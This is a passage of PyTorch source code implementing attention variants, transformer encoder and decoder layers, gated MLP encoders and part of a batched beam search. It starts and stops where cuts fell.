# a has dim [B, H, T, 1, W]
window_sz = a.shape[-1]
value = unfold_tensor(value, dim=2, window_sz=window_sz).transpose(-1, -2) # [B, H, T, W, d_value]
updated_values = torch.matmul(a, value) # [B, H, T, 1, d_value]
if rpr_value is not None:
rpr_value = rpr_value.unsqueeze(0).unsqueeze(0).unsqueeze(0) # [1, 1, 1, W, d_value]
update_rpr_values = torch.matmul(a, rpr_value) # [B, H, T, 1, d_value]
return (updated_values + update_rpr_values).squeeze(3) # [B, H, T, d_value]
else:
return updated_values.squeeze(3)
class SeqBahdanauAttention(SequenceSequenceAttention):
def __init__(self, hsz: int, pdrop: float = 0.1, **kwargs):
super().__init__(hsz, pdrop=pdrop, **kwargs)
self.V = pytorch_linear(self.hsz, 1, bias=False)
def _attention(self, query: torch.Tensor, key: torch.Tensor, mask: Optional[torch.Tensor] = None) -> torch.Tensor:
# [B, H, T, 1, D] + [B, H, 1, T, D] = [B, H, T, T, D]
additive = query.unsqueeze(-2) + key.unsqueeze(-3)
non_linear = torch.tanh(additive)
# [B, H, T, T, D] @ [D, 1] = [B, H, T, T, 1]
scores = self.V(non_linear)
# [B, H, T, T]
scores = scores.squeeze(-1)
return F.softmax(scores, dim=-1)
class MultiHeadedAttention(nn.Module):
"""
Multi-headed attention from https://arxiv.org/abs/1706.03762 via http://nlp.seas.harvard.edu/2018/04/03/attention.html
Multi-headed attention provides multiple looks of low-order projections K, Q and V using an attention function
(specifically `scaled_dot_product_attention` in the paper. This allows multiple relationships to be illuminated
via attention on different positional and representational information from each head.
The number of heads `h` times the low-order projection dim `d_k` is equal to `d_model` (which is asserted upfront).
This means that each weight matrix can be simply represented as a linear transformation from `d_model` to `d_model`,
and partitioned into heads after the fact.
Finally, an output projection is applied which brings the output space back to `d_model`, in preparation for the
sub-sequent `FFN` sub-layer.
There are 3 uses of multi-head attention in the Transformer.
For encoder-decoder layers, the queries come from the previous decoder layer, and the memory keys come from
the encoder. For encoder layers, the K, Q and V all come from the output of the previous layer of the encoder.
And for self-attention in the decoder, K, Q and V all come from the decoder, but here it is masked to prevent using
future values
"""
def __init__(
self, num_heads: int, d_model: int, dropout: float = 0.1, scale: bool = False, d_k: Optional[int] = None, ra_type: Optional[str] = None,
):
"""Constructor for multi-headed attention
:param h: The number of heads
:param d_model: The model hidden size
:param dropout (``float``): The amount of dropout to use
:param scale: Should we scale the dot product attention
:param d_k: The low-order project per head. This is normally `d_model // num_heads` unless set explicitly
:param ra_type: If there is an attention bias term, that will be encapsulated in the attention computation
"""
super().__init__()
if d_k is None:
self.d_k = d_model // num_heads
if d_model % num_heads != 0:
raise Exception(f"d_model ({d_model}) must be evenly divisible by num_heads ({num_heads})")
else:
self.d_k = d_k
self.h = num_heads
# for multi-headed attention, w_V projects to h heads, each head has dim d_k; for single headed attention, w_V
# project to 1 head with dim d_model
if self.h > 1:
self.d_value = self.d_k
else:
self.d_value = d_model
self.w_Q = Dense(d_model, self.d_k * self.h)
self.w_K = Dense(d_model, self.d_k * self.h)
self.w_V = Dense(d_model, self.d_value * self.h)
if self.h > 1: # w_O is not needed for single headed attention
self.w_O = Dense(self.d_k * self.h, d_model)
if scale:
if ra_type == 'alibi':
self.attn_fn = SeqScaledDotProductAttentionALiBi(dropout, num_heads=num_heads)
elif ra_type == 't5':
# TODO: pass through options
self.attn_fn = SeqScaledDotProductAttentionT5(dropout, num_heads=num_heads)
else:
self.attn_fn = SeqScaledDotProductAttention(dropout)
else:
if ra_type == 'alibi':
self.attn_fn = SeqDotProductAttentionALiBi(dropout, num_heads=num_heads)
elif ra_type == 't5':
# TODO: pass through options
self.attn_fn = SeqDotProductAttentionT5(dropout, num_heads=num_heads)
else:
self.attn_fn = SeqDotProductAttention(dropout)
self.attn = None
def forward(self, qkvm: Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor]) -> torch.Tensor:
"""Low-order projections of query, key and value into multiple heads, then attention application and dropout
:param query: a query for alignment. Can come from self in case of self-attn or decoder in case of E/D
:param key: a set of keys from encoder or self
:param value: a set of values from encoder or self
:param mask: masking (for destination) to prevent seeing what we shouldnt
:return: Multi-head attention output, result of attention application to sequence (B, T, d_model)
"""
query, key, value, mask = qkvm
batchsz = query.size(0)
# (B, H, T, D)
query = self.w_Q(query).view(batchsz, -1, self.h, self.d_k).transpose(1, 2)
key = self.w_K(key).view(batchsz, -1, self.h, self.d_k).transpose(1, 2)
value = self.w_V(value).view(batchsz, -1, self.h, self.d_value).transpose(1, 2)
x = self.attn_fn((query, key, value, mask))
self.attn = self.attn_fn.attn
x = x.transpose(1, 2).contiguous().view(batchsz, -1, self.h * self.d_value)
if self.h > 1:
return self.w_O(x)
else:
return x
class MultiHeadedRelativeAttention(nn.Module):
"""
Multi-headed relative attention from Shaw et al 2018 (https://www.aclweb.org/anthology/N18-2074.pdf)
This method follows the same approach of MultiHeadedAttention, but it computes Relative Position Representations (RPR)
which are used as part of the attention computations. To facilitate this, the model has its own internal
embeddings lookup table, and it has an updated computation for both the attention weights and the application
of those weights to follow them.
"""
def __init__(
self,
num_heads: int,
d_model: int,
rpr_k: int,
dropout: float = 0.1,
scale: bool = False,
d_k: Optional[int] = None,
windowed_ra: bool = False,
rpr_value_on: bool = True
):
"""Constructor for multi-headed attention
:param num_heads: The number of heads
:param d_model: The model hidden size
:param rpr_k: distance within which relative positional embedding will be considered
:param windowed_ra: whether prevent attention beyond rpr_k
:param dropout (``float``): The amount of dropout to use
:param scale: Should we scale the dot product attention
:param d_k: The low-order project per head. This is normally `d_model // num_heads` unless set explicitly
"""
super().__init__()
if d_k is None:
self.d_k = d_model // num_heads
if d_model % num_heads != 0:
raise Exception(f"d_model ({d_model}) must be evenly divisible by num_heads ({num_heads})")
else:
self.d_k = d_k
self.h = num_heads
# for multi-headed attention, w_V projects to h heads, each head has dim d_k; for single headed attention, w_V
# project to 1 head with dim d_model
if self.h > 1:
self.d_value = self.d_k
else:
self.d_value = d_model
self.rpr_k = rpr_k
self.rpr_value_on = rpr_value_on
self.rpr_key = nn.Embedding(2 * rpr_k + 1, self.d_k)
if self.rpr_value_on:
self.rpr_value = nn.Embedding(2 * rpr_k + 1, self.d_value)
self.windowed_ra = windowed_ra
self.w_Q = Dense(d_model, self.d_k * self.h)
self.w_K = Dense(d_model, self.d_k * self.h)
self.w_V = Dense(d_model, self.d_value * self.h)
if self.h > 1: # w_O is not needed for sinlge headed attention
self.w_O = Dense(self.d_k * self.h, d_model)
if scale:
if windowed_ra:
self.attn_fn = SeqScaledWindowedRelativeAttention(dropout)
else:
self.attn_fn = SeqScaledDotProductRelativeAttention(dropout)
else:
self.attn_fn = SeqDotProductRelativeAttention(dropout)
self.attn = None
def make_rpr(self, q_len, k_len, device) -> Tuple[torch.Tensor, torch.Tensor]:
"""Create a matrix shifted by self.rpr_k and bounded between 0 and 2*self.rpr_k to provide 0-based indexing for embedding
"""
q_seq = torch.arange(q_len).to(device)
k_seq = torch.arange(k_len).to(device)
window_len = 2 * self.rpr_k
edges = k_seq.view(1, -1) - q_seq.view(-1, 1) + self.rpr_k # [q_len, k_len]
edges = torch.clamp(edges, 0, window_len)
if self.rpr_value_on:
return self.rpr_key(edges), self.rpr_value(edges) # [q_len, k_len, d_k]
else:
return self.rpr_key(edges), None
def make_windowed_rpr(self, device):
window_len = 2 * self.rpr_k + 1
window = torch.arange(window_len).to(device)
if self.rpr_value_on:
return self.rpr_key(window), self.rpr_value(window)
else:
return self.rpr_key(window), None
def forward(self, qkvm: Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor]) -> torch.Tensor:
"""Low-order projections of query, key and value into multiple heads, then attention application and dropout
:param query: a query for alignment. Can come from self in case of self-attn or decoder in case of E/D
:param key: a set of keys from encoder or self
:param value: a set of values from encoder or self
:param mask: masking (for destination) to prevent seeing what we shouldnt
:return: Multi-head attention output, result of attention application to sequence (B, T, d_model)
"""
query, key, value, mask = qkvm
batchsz = query.size(0)
query_len = query.size(1)
key_len = key.size(1) # key and value have the same length, but query can have a different length
# (B, H, T, D)
query = self.w_Q(query).view(batchsz, -1, self.h, self.d_k).transpose(1, 2)
key = self.w_K(key).view(batchsz, -1, self.h, self.d_k).transpose(1, 2)
value = self.w_V(value).view(batchsz, -1, self.h, self.d_value).transpose(1, 2)
if self.windowed_ra:
rpr_key, rpr_value = self.make_windowed_rpr(query.device)
else:
rpr_key, rpr_value = self.make_rpr(query_len, key_len, query.device)
x = self.attn_fn((query, key, value, rpr_key, rpr_value, mask))
self.attn = self.attn_fn.attn
x = x.transpose(1, 2).contiguous().view(batchsz, -1, self.h * self.d_value)
if self.h > 1:
return self.w_O(x)
else:
return x
class TransformerEncoderBase(nn.Module):
def __init__(
self,
num_heads: int,
d_model: int,
pdrop: float,
scale: bool = True,
activation_type: str = "gelu",
d_ff: Optional[int] = None,
d_k: Optional[int] = None,
rpr_k: Optional[int] = None,
ffn_pdrop: Optional[float] = 0.0,
layer_norm_eps: float = 1.0e-6,
windowed_ra: Optional[bool] = False,
rpr_value_on: bool = True,
ra_type: Optional[str] = None,
**kwargs,
):
super().__init__()
self.d_model = d_model
self.d_ff = d_ff if d_ff is not None else 4 * d_model
if rpr_k is not None and rpr_k != 0:
self.self_attn = MultiHeadedRelativeAttention(num_heads, d_model, rpr_k, pdrop, scale, d_k=d_k,
windowed_ra=windowed_ra, rpr_value_on=rpr_value_on)
else:
self.self_attn = MultiHeadedAttention(num_heads, d_model, pdrop, scale=scale, d_k=d_k, ra_type=ra_type)
self.ffn = nn.Sequential(
Dense(self.d_model, self.d_ff),
get_activation(activation_type),
nn.Dropout(ffn_pdrop),
Dense(self.d_ff, self.d_model),
)
self.ln1 = nn.LayerNorm(self.d_model, eps=layer_norm_eps)
self.ln2 = nn.LayerNorm(self.d_model, eps=layer_norm_eps)
self.dropout = nn.Dropout(pdrop)
class PreLNTransformerEncoder(TransformerEncoderBase):
def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
"""
:param inputs: `(x, mask)`
:return: The output tensor
"""
x, mask = inputs
h = self.ln1(x)
x = x + self.dropout(self.self_attn((h, h, h, mask)))
x = x + self.dropout(self.ffn(self.ln2(x)))
return x
class PreLNBeforeResConnTransformerEncoder(TransformerEncoderBase):
def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
"""
:param inputs: `(x, mask)`
:return: The output tensor
"""
x, mask = inputs
x = self.ln1(x)
h = self.self_attn((x, x, x, mask))
x = x + self.dropout(h)
x = self.ln2(x)
x = x + self.dropout(self.ffn(x))
return x
class PostLNTransformerEncoder(TransformerEncoderBase):
def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
"""
:param inputs: `(x, mask)`
:return: The output tensor
"""
x, mask = inputs
h = self.self_attn((x, x, x, mask))
x = x + self.dropout(h)
x = self.ln2(x)
x = x + self.dropout(self.ffn(x))
x = self.ln1(x)
return x
class SpatialGatingUnit(nn.Module):
"""Spatial gating unit
There are 2 ways we can look at this unit, as an MLP or a Conv with kernel length 1
l = nn.Linear(T, T)
c = nn.Conv1d(T, T, 1)
l(x.transpose(1, 2)).transpose(1, 2)
c(x)
"""
def __init__(self,
d_ffn: int,
nctx: int,
layer_norm_eps: float = 1.0e-6):
super().__init__()
self.norm = nn.LayerNorm(d_ffn // 2, eps=layer_norm_eps)
self.proj = pytorch_conv1d(nctx, nctx, 1)
nn.init.constant_(self.proj.bias, 1.0)
def split(self, x):
u, v = x.chunk(2, dim=-1)
return u, v
def forward(self, x):
u, v = self.split(x)
v = self.norm(v)
v = self.proj(v)
return u * v
class GatedMLPEncoder(nn.Module):
"""Following https://arxiv.org/pdf/2105.08050.pdf
"""
def __init__(
self,
d_model: int,
pdrop: float,
nctx: int = 256,
activation_type: str = "gelu",
d_ff: Optional[int] = None,
ffn_pdrop: Optional[float] = 0.0,
layer_norm_eps: float = 1.0e-6
):
super().__init__()
self.d_model = d_model
self.d_ff = d_ff if d_ff is not None else 4 * d_model
self.to_ffn = Dense(self.d_model, self.d_ff)
self.activation = get_activation(activation_type)
self.ffn_drop = nn.Dropout(ffn_pdrop)
self.from_sgu = Dense(self.d_ff//2, self.d_model)
self.norm = nn.LayerNorm(self.d_model, eps=layer_norm_eps)
self.dropout = nn.Dropout(pdrop)
self.spatial_gating_unit = SpatialGatingUnit(self.d_ff, nctx, layer_norm_eps)
def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
"""Do gMLP forward
TODO: we arent using the mask ATM
:param inputs: `(x, mask)`
:return: The output tensor
"""
# The shortcut here happens pretty early
shortcut, mask = inputs
# A "channel" norm
x = self.norm(shortcut)
# A "channel" FFN
x = self.dropout(self.to_ffn(x))
# gelu according to https://arxiv.org/pdf/2105.08050.pdf
x = self.activation(x)
# "spatial" projection (over T)
x = self.spatial_gating_unit(x)
# "channel" projection
x = self.from_sgu(x)
x = self.dropout(x)
return x + shortcut
class TransformerDecoderBase(nn.Module):
def __init__(
self,
num_heads: int,
d_model: int,
pdrop: float,
scale: bool = True,
activation_type: str = "gelu",
d_ff: Optional[int] = None,
d_k: Optional[int] = None,
rpr_k: Optional[int] = None,
ffn_pdrop: Optional[float] = 0.0,
layer_norm_eps: float = 1.0e-6,
rpr_value_on: bool = True,
ra_type: Optional[str] = None,
):
super().__init__()
self.d_model = d_model
self.d_ff = d_ff if d_ff is not None else 4 * d_model
if rpr_k is not None:
self.self_attn = MultiHeadedRelativeAttention(num_heads, d_model, rpr_k, pdrop, scale, d_k=d_k, rpr_value_on=rpr_value_on)
self.src_attn = MultiHeadedRelativeAttention(num_heads, d_model, rpr_k, pdrop, scale, d_k=d_k, rpr_value_on=rpr_value_on)
else:
self.self_attn = MultiHeadedAttention(num_heads, d_model, pdrop, scale, d_k=d_k, ra_type=ra_type)
self.src_attn = MultiHeadedAttention(num_heads, d_model, pdrop, scale, d_k=d_k, ra_type=ra_type)
self.ffn = nn.Sequential(
Dense(self.d_model, self.d_ff),
nn.Dropout(ffn_pdrop),
get_activation(activation_type),
Dense(self.d_ff, self.d_model),
)
self.ln1 = nn.LayerNorm(self.d_model, eps=layer_norm_eps)
self.ln2 = nn.LayerNorm(self.d_model, eps=layer_norm_eps)
self.ln3 = nn.LayerNorm(self.d_model, eps=layer_norm_eps)
self.dropout = nn.Dropout(pdrop)
class PreLNTransformerDecoder(TransformerDecoderBase):
def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor]) -> torch.Tensor:
x, memory, src_mask, tgt_mask = inputs
h = self.ln1(x)
x = x + self.dropout(self.self_attn((h, h, h, tgt_mask)))
h = self.ln2(x)
x = x + self.dropout(self.src_attn((h, memory, memory, src_mask)))
h = self.ln3(x)
x = x + self.dropout(self.ffn(h))
return x
class PreLNBeforeResConnTransformerDecoder(TransformerDecoderBase):
def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor]) -> torch.Tensor:
x, memory, src_mask, tgt_mask = inputs
x = self.ln1(x)
x = x + self.dropout(self.self_attn((x, x, x, tgt_mask)))
x = self.ln2(x)
x = x + self.dropout(self.src_attn((x, memory, memory, src_mask)))
x = self.ln3(x)
x = x + self.dropout(self.ffn(x))
return x
class PostLNTransformerDecoder(nn.Module):
def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor]) -> torch.Tensor:
x, memory, src_mask, tgt_mask = inputs
x = x + self.dropout(self.self_attn((x, x, x, tgt_mask)))
x = self.ln2(x)
x = x + self.dropout(self.src_attn((x, memory, memory, src_mask)))
x = self.ln3(x)
x = x + self.dropout(self.ffn(x))
x = self.ln1(x)
return x
class TransformerEncoderStack(nn.Module):
def __init__(
self,
num_heads: int,
d_model: int,
pdrop: float,
scale: bool = True,
layers: int = 1,
activation: str = "relu",
d_ff: Optional[int] = None,
d_k: Optional[int] = None,
rpr_k: Optional[Union[int, List[int]]] = None,
ffn_pdrop: Optional[float] = 0.0,
layer_norms_after: bool = False,
layer_norm_eps: float = 1.0e-6,
windowed_ra: Optional[bool] = False,
rpr_value_on: bool = True,
layer_drop: float = 0.0,
ra_type: Optional[str] = None,
transformer_type: Optional[str] = False,
**kwargs,
):
super().__init__()
self.encoders = nn.ModuleList()
if layer_norms_after or transformer_type == "post-layer-norm":
logger.info("Using post-layer-norm transformer (encoder)")
TransformerEncoder = PostLNTransformerEncoder
self.ln = nn.Identity()
elif transformer_type == "pre-layer-norm":
TransformerEncoder = PreLNTransformerEncoder
self.ln = nn.LayerNorm(d_model, eps=layer_norm_eps)
else: # transformer_type == "pre-layer-norm-before-resconn"
logger.info("Using layer norm before residual connections (encoder)")
if layer_norms_after:
raise Exception(f"Mutually exclusive options ({transformer_type}) and layer_norms_after=True)",)
TransformerEncoder = PreLNBeforeResConnTransformerEncoder
self.ln = nn.LayerNorm(d_model, eps=layer_norm_eps)
self.output_dim = d_model
self.layer_drop = layer_drop
if not is_sequence(rpr_k):
rpr_k = [rpr_k] * layers
elif len(rpr_k) == 1:
rpr_k = [rpr_k[0]] * layers
for i in range(layers):
self.encoders.append(
TransformerEncoder(
num_heads, d_model, pdrop, scale, activation, d_ff, d_k,
rpr_k=rpr_k[i], ffn_pdrop=ffn_pdrop,
layer_norm_eps=layer_norm_eps, windowed_ra=windowed_ra, rpr_value_on=rpr_value_on, ra_type=ra_type
)
)
def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
x, mask = inputs
for layer in self.encoders:
pdrop = np.random.random()
if not self.training or (pdrop >= self.layer_drop):
x = layer((x, mask))
return self.ln(x)
class GatedMLPEncoderStack(nn.Module):
"""Following https://arxiv.org/pdf/2105.08050.pdf
"""
def __init__(
self,
d_model: int,
pdrop: float,
layers: int = 1,
nctx: int = 256,
activation: str = "gelu",
d_ff: Optional[int] = None,
ffn_pdrop: Optional[float] = 0.0,
layer_norm_eps: float = 1.0e-6,
layer_drop: float = 0.0,
**kwargs,
):
super().__init__()
self.encoders = nn.ModuleList()
self.ln = nn.LayerNorm(d_model, eps=layer_norm_eps)
self.output_dim = d_model
self.layer_drop = layer_drop
for i in range(layers):
self.encoders.append(
GatedMLPEncoder(
d_model, pdrop, nctx, activation, d_ff,
ffn_pdrop=ffn_pdrop,
layer_norm_eps=layer_norm_eps,
)
)
def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
x, mask = inputs
for layer in self.encoders:
pdrop = np.random.random()
if not self.training or (pdrop >= self.layer_drop):
x = layer((x, mask))
return self.ln(x)
class TransformerEncoderStackWithLengths(TransformerEncoderStack):
def __init__(
self,
num_heads: int,
d_model: int,
pdrop: bool,
scale: bool = True,
layers: int = 1,
activation: str = "relu",
d_ff: Optional[int] = None,
d_k: Optional[int] = None,
rpr_k: Optional[Union[int, List[int]]] = None,
input_sz: Optional[int] = None,
ffn_pdrop: Optional[float] = 0.0,
layer_norms_after: bool = False,
layer_norm_eps: float = 1.0e-6,
windowed_ra: Optional[bool] = False,
rpr_value_on: bool = True,
layer_drop: float = 0.0,
ra_type: Optional[str] = None,
transformer_type: Optional[str] = None,
**kwargs,
):
super().__init__(num_heads, d_model, pdrop, scale, layers, activation, d_ff, d_k, rpr_k,
ffn_pdrop, layer_norms_after, layer_norm_eps, windowed_ra, rpr_value_on, layer_drop, ra_type, transformer_type, **kwargs)
self.proj = WithDropout(pytorch_linear(input_sz, d_model), pdrop)
def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
x, lengths = inputs
x = self.proj(x)
max_seqlen = x.shape[1]
mask = sequence_mask(lengths, max_seqlen).to(x.device)
return super().forward((x, mask.unsqueeze(1).unsqueeze(1)))
class TransformerEncoderStackWithTimeMask(TransformerEncoderStack):
def __init__(
self,
num_heads: int,
d_model: int,
pdrop: bool,
scale: bool = True,
layers: int = 1,
activation: str = "relu",
d_ff: Optional[int] = None,
d_k: Optional[int] = None,
rpr_k: Optional[Union[int, List[int]]] = None,
input_sz: Optional[int] = None,
ffn_pdrop: Optional[float] = 0.0,
layer_norms_after: bool = False,
layer_norm_eps: float = 1.0e-6,
windowed_ra: Optional[bool] = False,
rpr_value_on: bool = True,
layer_drop: float = 0.0,
ra_type: Optional[str] = None,
transformer_type: Optional[str] = None,
**kwargs,
):
super().__init__(num_heads, d_model, pdrop, scale, layers, activation, d_ff, d_k, rpr_k,
ffn_pdrop, layer_norms_after, layer_norm_eps, windowed_ra, rpr_value_on, layer_drop, ra_type, transformer_type, **kwargs)
self.proj = WithDropout(pytorch_linear(input_sz, d_model), pdrop)
def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
x, lengths = inputs
x = self.proj(x)
max_seqlen = x.shape[1]
mask = subsequent_mask(max_seqlen).to(x.device)
return super().forward((x, mask.unsqueeze(1).unsqueeze(1)))
class TransformerDecoderStack(nn.Module):
def __init__(
self,
num_heads: int,
d_model: int,
pdrop: float,
scale: bool = True,
layers: int = 1,
activation_type: str = "relu",
d_ff: Optional[int] = None,
d_k: Optional[int] = None,
rpr_k: Optional[Union[int, List[int]]] = None,
ffn_pdrop: Optional[float] = 0.0,
layer_norms_after: bool = False,
layer_norm_eps: float = 1.0e-6,
layer_drop: float = 0.0,
rpr_value_on: bool = True,
ra_type: Optional[str] = None,
transformer_type: Optional[str] = None,
**kwargs,
):
super().__init__()
self.decoders = nn.ModuleList()
self.layer_drop = layer_drop
if layer_norms_after or transformer_type == "post-layer-norm":
logger.info("Using post-layer-norm transformer (decoder)")
TransformerDecoder = PostLNTransformerDecoder
self.ln = nn.Identity()
elif transformer_type == "pre-layer-norm":
TransformerDecoder = PreLNTransformerDecoder
self.ln = nn.LayerNorm(d_model, eps=layer_norm_eps)
else: # transformer_type == "pre-layer-norm-before-resconn"
logger.info("Using layer norm before residual connections (decoder)")
if layer_norms_after:
raise Exception(f"Mutually exclusive options ({transformer_type}) and layer_norms_after=True)",)
TransformerDecoder = PreLNBeforeResConnTransformerDecoder
self.ln = nn.LayerNorm(d_model, eps=layer_norm_eps)
if not is_sequence(rpr_k):
rpr_k = [rpr_k] * layers
elif len(rpr_k) == 1:
rpr_k = [rpr_k[0]] * layers
for i in range(layers):
self.decoders.append(
TransformerDecoder(num_heads, d_model, pdrop, scale, activation_type, d_ff,
d_k=d_k, rpr_k=rpr_k[i], ffn_pdrop=ffn_pdrop,
layer_norm_eps=layer_norm_eps,
rpr_value_on=rpr_value_on, ra_type=ra_type)
)
def forward(self, inputs):
x, memory, src_mask, tgt_mask = inputs
for layer in self.decoders:
pdrop = np.random.random()
if not self.training or (pdrop >= self.layer_drop):
x = layer((x, memory, src_mask, tgt_mask))
return self.ln(x)
def update_lengths(lengths, eoses, idx):
"""Update the length of a generated tensor based on the first EOS found.
This is useful for a decoding situation where tokens after an EOS
can be something other than EOS. This also makes sure that a second
generated EOS doesn't affect the lengths.
:param lengths: `torch.LongTensor`: The lengths where zero means an
unfinished sequence.
:param eoses: `torch.ByteTensor`: A mask that has 1 for sequences that
generated an EOS.
:param idx: `int`: What value to fill the finished lengths with (normally
the current decoding timestep).
:returns: `torch.Tensor`: The updated lengths tensor (same shape and type).
"""
# If a length is 0 it has never had a length set so it is eligible to have
# this EOS be the length.
updatable_lengths = lengths == 0
# If this length can be updated AND this token is an eos
lengths_mask = updatable_lengths & eoses
return lengths.masked_fill(lengths_mask, idx)
def gnmt_length_penalty(lengths, alpha=0.8):
"""Calculate a length penalty from https://arxiv.org/pdf/1609.08144.pdf
The paper states the penalty as (5 + |Y|)^a / (5 + 1)^a. This is implemented
as ((5 + |Y|) / 6)^a for a (very) tiny performance boost
:param lengths: `torch.LongTensor`: [B, K] The lengths of the beams.
:param alpha: `float`: A hyperparameter. See Table 2 for a search on this
parameter.
:returns:
`torch.FloatTensor`: [B, K, 1] The penalties.
"""
lengths = lengths.to(torch.float)
penalty = torch.pow(((5 + lengths) / 6), alpha)
return penalty.unsqueeze(-1)
def no_length_penalty(lengths):
"""A dummy function that returns a no penalty (1)."""
return torch.ones_like(lengths).to(torch.float).unsqueeze(-1)
def repeat_batch(t, K, dim=0):
"""Repeat a tensor while keeping the concept of a batch.
:param t: `torch.Tensor`: The tensor to repeat.
:param K: `int`: The number of times to repeat the tensor.
:param dim: `int`: The dimension to repeat in. This should be the
batch dimension.
:returns: `torch.Tensor`: The repeated tensor. The new shape will be
batch size * K at dim, the rest of the shapes will be the same.
Example::
>>> a = torch.arange(10).view(2, -1)
>>> a
tensor([[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9]])
>>> a.repeat(2, 1)
tensor([[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9],
[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9]])
>>> repeat_batch(a, 2)
tensor([[0, 1, 2, 3, 4],
[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9],
[5, 6, 7, 8, 9]])
"""
shape = t.shape
tiling = [1] * (len(shape) + 1)
tiling[dim + 1] = K
tiled = t.unsqueeze(dim + 1).repeat(tiling)
old_bsz = shape[dim]
new_bsz = old_bsz * K
new_shape = list(shape[:dim]) + [new_bsz] + list(shape[dim + 1 :])
return tiled.view(new_shape)
class BeamSearchBase:
def __init__(self, beam=1, length_penalty=None, **kwargs):
self.length_penalty = length_penalty if length_penalty else no_length_penalty
self.K = beam
def init(self, encoder_outputs):
pass
def step(self, paths, extra):
pass
def update(self, beams, extra):
pass
def __call__(self, encoder_outputs, **kwargs):
"""Perform batched Beam Search.
Note:
The paths and lengths generated do not include the <GO> token.
:param encoder_outputs: `namedtuple` The outputs of the encoder class.
:param init: `Callable(ecnoder_outputs: encoder_outputs, K: int)` -> Any: A
callable that is called once at the start of the search to initialize
things. This returns a blob that is passed to other callables.
:param step: `Callable(paths: torch.LongTensor, extra) -> (probs: torch.FloatTensor, extra):
A callable that is does a single decoding step. It returns the log
probabilities over the vocabulary in the last dimension. It also returns
any state the decoding process needs.
:param update: `Callable(beams: torch.LongTensor, extra) -> extra:
A callable that is called to edit the decoding state based on the selected
best beams.
:param length_penalty: `Callable(lengths: torch.LongTensor) -> torch.floatTensor
A callable that generates a penalty based on the lengths. Lengths is
[B, K] and the returned penalty should be [B, K, 1] (or [B, K, V] to
have token based penalties?)
:Keyword Arguments:
* *beam* -- `int`: The number of beams to use.
* *mxlen* -- `int`: The max number of steps to run the search for.
:returns:
tuple(preds: torch.LongTensor, lengths: torch.LongTensor, scores: torch.FloatTensor)
preds: The predicted values: [B, K, max(lengths)]
lengths: The length of each prediction [B, K]
scores: The score of each path [B, K]
"""
mxlen = kwargs.get("mxlen", 100)
bsz = encoder_outputs.output.shape[0]
device = encoder_outputs.output.device
with torch.no_grad():
extra = self.init(encoder_outputs)
paths = torch.full((bsz, self.K, 1), Offsets.GO, dtype=torch.long, device=device)
# This tracks the log prob of each beam. This is distinct from score which
# is based on the log prob and penalties.
log_probs = torch.zeros((bsz, self.K), dtype=torch.float, device=device)
# Tracks the lengths of the beams, unfinished beams have lengths of zero.
lengths = torch.zeros((bsz, self.K), dtype=torch.long, device=device)
for i in range(mxlen - 1):
probs, extra = self.step(paths, extra)
V = probs.shape[-1]
probs = probs.view((bsz, self.K, V)) # [B, K, V]
if i > 0:
# This mask is for all beams that are done.
done_mask = (lengths != 0).unsqueeze(-1) # [B, K, 1]
# Can creating this mask be moved out of the loop? It never changes but we don't have V
# This mask selects the EOS token
eos_mask = torch.zeros((1, 1, V), dtype=done_mask.dtype, device=device)
eos_mask[:, :, Offsets.EOS] = 1
# This mask selects the EOS token of only the beams that are done.
mask = done_mask & eos_mask
# Put all probability mass on the EOS token for finished beams.
# Otherwise as the other beams get longer they will all give
# up and eventually select this beam and all outputs become
# the same.
probs = probs.masked_fill(done_mask, -np.inf)
probs = probs.masked_fill(mask, 0)
probs = log_probs.unsqueeze(-1) + probs # [B, K, V]
# Calculate the score of the beam based on the current length.
path_scores = probs / self.length_penalty(lengths.masked_fill(lengths == 0, i + 1))
else:
# On the first step we only look at probabilities for the first beam.
# If we don't then the probs will be the same for each beam
# This means the same token will be selected for each beam
# And we won't get any diversity.
# Using only the first beam ensures K different starting points.
path_scores = probs[:, 0, :]
flat_scores = path_scores.view(bsz, -1) # [B, K * V]
best_scores, best_idx = flat_scores.topk(self.K, 1)
# Get the log_probs of the best scoring beams
log_probs = probs.view(bsz, -1).gather(1, best_idx).view(bsz, self.K)
best_beams = best_idx // V # Get which beam it came from
best_idx = best_idx % V # Get the index of the word regardless of which beam it is.
# Best Beam index is relative within the batch (only [0, K)).
# This makes the index global (e.g. best beams for the second
# batch example is in [K, 2*K)).
offsets = torch.arange(bsz, dtype=torch.long, device=device) * self.K
offset_beams = best_beams + offsets.unsqueeze(-1)
flat_beams = offset_beams.view(bsz * self.K)
# Select the paths to extend based on the best beams
flat_paths = paths.view(bsz * self.K, -1)
new_paths = flat_paths[flat_beams, :].view(bsz, self.K, -1)
# Add the selected outputs to the paths
paths = torch.cat([new_paths, best_idx.unsqueeze(-1)], dim=2)
# Select the lengths to keep tracking based on the valid beams left.
lengths = lengths.view(-1)[flat_beams].view((bsz, self.K))
extra = self.update(flat_beams, extra)
# Updated lengths based on if we hit EOS
last = paths[:, :, -1]
eoses = last == Offsets.EOS
lengths = update_lengths(lengths, eoses, i + 1)
if (lengths != 0).all():
break
else:
# This runs if the loop didn't break meaning one beam hit the max len
# Add an EOS to anything that hasn't hit the end. This makes the scores real.
probs, extra = self.step(paths, extra)
V = probs.size(-1)
probs = probs.view((bsz, self.K, V))
probs = probs[:, :, Offsets.EOS] # Select the score of EOS
# If any of the beams are done mask out the score of this EOS (they already had an EOS)
